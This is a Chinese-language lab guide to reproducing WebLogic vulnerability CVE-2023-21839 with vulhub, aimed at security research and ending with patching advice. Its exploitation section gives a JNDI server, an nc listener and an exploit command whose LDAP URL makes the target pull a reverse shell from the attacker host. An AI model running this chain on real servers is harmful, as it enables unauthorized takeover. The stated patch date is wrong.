Weblogic远程代码执行漏洞CVE-2023-21839复现
字数 1109 2025-08-11 01:06:30

WebLogic远程代码执行漏洞CVE-2023-21839复现指南

1. 漏洞概述

WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。

2023年4月19日,Oracle发布安全补丁修复WebLogic中间件漏洞(CVE-2023-21839/CNVD-2023-04389)。该漏洞存在于WebLogic的IIOP/T3协议中,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server。漏洞利用成功后,WebLogic Server可能被攻击者接管执行任意命令,导致服务器沦陷或者造成严重的敏感数据泄露。

2. 影响版本

文档中未明确列出具体受影响版本,但根据Oracle安全公告,建议所有使用WebLogic Server的用户检查并更新到最新版本。

3. 环境准备

主机准备

  • Linux主机:1台(作为靶机)
  • Kali Linux:1台(作为攻击机)

相关软件包

  1. 漏洞利用工具: CVE-2023-21839
  2. JNDI注入工具: JNDIExploit.v1.2

4. 环境搭建

靶机环境搭建(使用Docker)

  1. 安装Docker

    # 添加阿里镜像源
yum-config-manager --add-repo http://mirrors.aliyun.com/docker-ce/linux/centos/docker-ce
# 更新yum软件包索引
yum makecache fast
# 安装docker-ce
yum install docker-ce docker-ce-cli containerd.io
# 启动docker
systemctl start docker
# 设置docker自启动
systemctl enable docker
# 查看版本
docker version

  2. 安装docker-compose

    # 安装pip
yum install -y python-pip
# 更新pip(注意CentOS7默认Python2.7的限制)
pip install -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com --upgrade pip==20.3.4
# 安装docker-compose
pip install -i http://pypi.douban.com/simple/ --trusted-host pypi.douban.com docker-compose
# 查看版本
docker-compose -v

  3. 搭建漏洞环境

    # 拉取漏洞环境
git clone git://github.com/vulhub/vulhub.git
# 进入对应目录启用环境
cd vulhub/weblogic/CVE-2023-21839
docker-compose up -d

  4. 验证环境
    访问 http://靶机IP:7001/console/login/LoginForm.jsp 应能看到WebLogic后台管理登录界面。

5. 工具准备

CVE-2023-21839工具

  1. 下载工具: https://github.com/4ra1n/CVE-2023-21839
  2. 上传到Kali并编译: 
    # 安装go环境
apt install gccgo-go
# 解压工具
unzip CVE-2023-21839.zip
# 编译工具
cd CVE-2023-21839-master/cmd
go build -o CVE-2023-21839

JNDIExploit工具

  1. 下载工具: https://github.com/Mr-xn/JNDIExploit-1/releases/tag/v1.2
  2. 上传到Kali并解压: 
    unzip JNDIExploit.v1.2.zip

6. 漏洞复现步骤

  1. 在Kali上设置JNDI监听

    java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 攻击机IP

  2. 在Kali上设置nc监听

    nc -lvp 8866

  3. 执行漏洞利用

    cd CVE-2023-21839-master/cmd
./CVE-2023-21839 -ip 靶机IP -port 7001 -ldap ldap://攻击机IP:1389/Basic/ReverseShell/攻击机IP/8866

  4. 验证结果
    如果漏洞存在且利用成功,将在nc监听窗口获得反弹的shell。

7. 修复建议

官方修复措施

Oracle官方已发布修复方案,建议及时更新:
Oracle安全公告

临时处置措施

  1. 禁用T3协议
  2. 对协议端口进行访问控制

注意事项

  1. 本教程仅用于安全研究和授权测试目的
  2. 在实际环境中进行测试前,请确保已获得相关授权
  3. 建议在隔离的测试环境中进行复现,避免影响生产系统
  4. 漏洞利用可能对目标系统造成不可逆的影响,请谨慎操作
WebLogic远程代码执行漏洞CVE-2023-21839复现指南 1. 漏洞概述 WebLogic是美国Oracle公司出品的一个application server,用于本地和云端开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 2023年4月19日,Oracle发布安全补丁修复WebLogic中间件漏洞(CVE-2023-21839/CNVD-2023-04389)。该漏洞存在于WebLogic的IIOP/T3协议中,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server。漏洞利用成功后,WebLogic Server可能被攻击者接管执行任意命令,导致服务器沦陷或者造成严重的敏感数据泄露。 2. 影响版本 文档中未明确列出具体受影响版本,但根据Oracle安全公告,建议所有使用WebLogic Server的用户检查并更新到最新版本。 3. 环境准备 主机准备 Linux主机:1台(作为靶机) Kali Linux:1台(作为攻击机) 相关软件包 漏洞利用工具: CVE-2023-21839 JNDI注入工具: JNDIExploit.v1.2 4. 环境搭建 靶机环境搭建(使用Docker) 安装Docker 安装docker-compose 搭建漏洞环境 验证环境 访问 http://靶机IP:7001/console/login/LoginForm.jsp 应能看到WebLogic后台管理登录界面。 5. 工具准备 CVE-2023-21839工具 下载工具: https://github.com/4ra1n/CVE-2023-21839 上传到Kali并编译: JNDIExploit工具 下载工具: https://github.com/Mr-xn/JNDIExploit-1/releases/tag/v1.2 上传到Kali并解压: 6. 漏洞复现步骤 在Kali上设置JNDI监听 在Kali上设置nc监听 执行漏洞利用 验证结果 如果漏洞存在且利用成功,将在nc监听窗口获得反弹的shell。 7. 修复建议 官方修复措施 Oracle官方已发布修复方案,建议及时更新: Oracle安全公告 临时处置措施 禁用T3协议 对协议端口进行访问控制 注意事项 本教程仅用于安全研究和授权测试目的 在实际环境中进行测试前,请确保已获得相关授权 建议在隔离的测试环境中进行复现,避免影响生产系统 漏洞利用可能对目标系统造成不可逆的影响,请谨慎操作